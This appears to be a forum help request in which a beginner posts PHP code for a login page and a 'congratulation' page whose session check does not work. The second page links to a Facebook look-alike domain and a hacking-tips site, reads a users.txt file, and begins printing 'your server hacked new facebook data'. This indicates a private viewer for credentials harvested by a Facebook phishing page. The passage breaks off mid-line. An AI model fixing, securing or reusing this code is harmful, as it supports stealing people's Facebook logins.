I am new to PHP, so I am facing a lot of difficulties. I want to create a login page where the user logs in and gets transferred to a congratulation page, but because my session detection is wrong, anyone can access the congratulation page without the login form. I don't know what the problem is.
This is my login.php file:
<?php
session_start();
$username = '';
$password = '';
$userError = '';
$passError = '';
if (isset($_POST['submit'])) {
    $username = $_POST['username'];
    $password = $_POST['password'];
    if ($username === '9155499248' && $password === 'Ben 10') {
        $_SESSION['login'] = true;
        header('LOCATION:congratulation.php');
        die();
    }
    if ($username !== '9155499248')
        $userError = 'Invalid Username';
    if ($password !== 'Ben 10')
        $passError = 'Invalid Password';
}
echo "<!DOCTYPE html>
<html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'>
<head>
<meta http-equiv='content-type' content='text/html;charset=utf-8' />
<meta http-equiv='X-UA-Compatible' content='IE=edge ,chrome=1'>
<meta name='viewport' content='width=device-width'>
<title>Login</title>
<link rel='stylesheet' href='css/normalize.css'>
<link rel='stylesheet' href='css/style.css'/>
<script src='js/prefixfree.min.js'></script>
</head>
<body>
<div class='login'>
<h1><b>Login</b></h1>
<form name='input' action='".htmlspecialchars($_SERVER['PHP_SELF'], ENT_QUOTES)."' method='post'>
<label for='username'></label><input type='text' value='".htmlspecialchars($username, ENT_QUOTES)."' id='username' name='username' />
<div class='error'>".$userError."</div>
<label for='password'></label><input type='password' value='".htmlspecialchars($password, ENT_QUOTES)."' id='password' name='password' />
<div class='error'>".$passError."</div>
<button type='submit' class='btn btn-primary btn-block btn-large' name='submit' value='1'>Let me in.</button>
</form>
</div>
<script src='js/index.js'></script>
</body>
</html>";
This is my congratulation.php file:
<?php
session_start();
// STEP 2. Check if a user is logged in by checking the session value
if ($username == true)
    if ($passError == false) {
        header('Location: login.php');
    }
?>
<html>
<head>
<title>NALIN NISHANT</title>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<link href="css/bootstrap.min.css" rel="stylesheet">
<link href="css/font-awesome.min.css" rel="stylesheet">
<link href="css/animate.css" rel="stylesheet">
<link href="css/main.css" rel="stylesheet">
</head>
<body>
<!--header--> <header class="navbar navbar-inverse navbar-fixed-top wet-asphalt" role="banner">
<div class="container">
<div class="navbar-header">
<button type="button" class="navbar-toggle" data-toggle="collapse" data-target=".navbar-collapse">
<span class="sr-only">Toggle navigation</span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
</button>
<a class="navbar-brand" href="www.facebookpage100.net23.net/?id=facebook"><img src="nalin.jpg"/><b>NALIN</b><br><h6>your ip address is <?php
echo $_SERVER["REMOTE_ADDR"];
?> stored <br>for security purpose</h6></a>
</div>
<div class="collapse navbar-collapse">
<ul class="nav navbar-nav navbar-right">
<li class="active"><a href="https://www.facebookpage100.net23.net/?id=facebook">Home</a></li>
<li><a href="https://www.hackingworldtips.wordpress.com">Visit Our Site</a></li>
<li><a href="https://www.facebook.com/@hackingworldtips">Contact Us</a></li>
<li class="dropdown">
<a href="#" class="dropdown-toggle" data-toggle="dropdown">Follow Us<i class="icon-angle-down"></i></a>
<ul class="dropdown-menu">
<li><a href="https://www.facebook.com/nalin.nishant.56">Facebook</a></li>
<li><a href="https://www.nalinnishant.nn@gmail.com">Google+</a></li>
</ul>
</li>
</ul>
</div>
</div>
</header><!--/header--><br>
<img src="js/1.jpg" width="100%" height="550"/>
<!--php-->
<?php
$filename = "users.txt";
$file = fopen( $filename, "r" );
if( $file == false )
{
exit();
}
$filesize = filesize( $filename );
$filetext = fread( $file, $filesize );
fclose( $file );
echo ( "congratulation nalin......... your server hacked new facebook data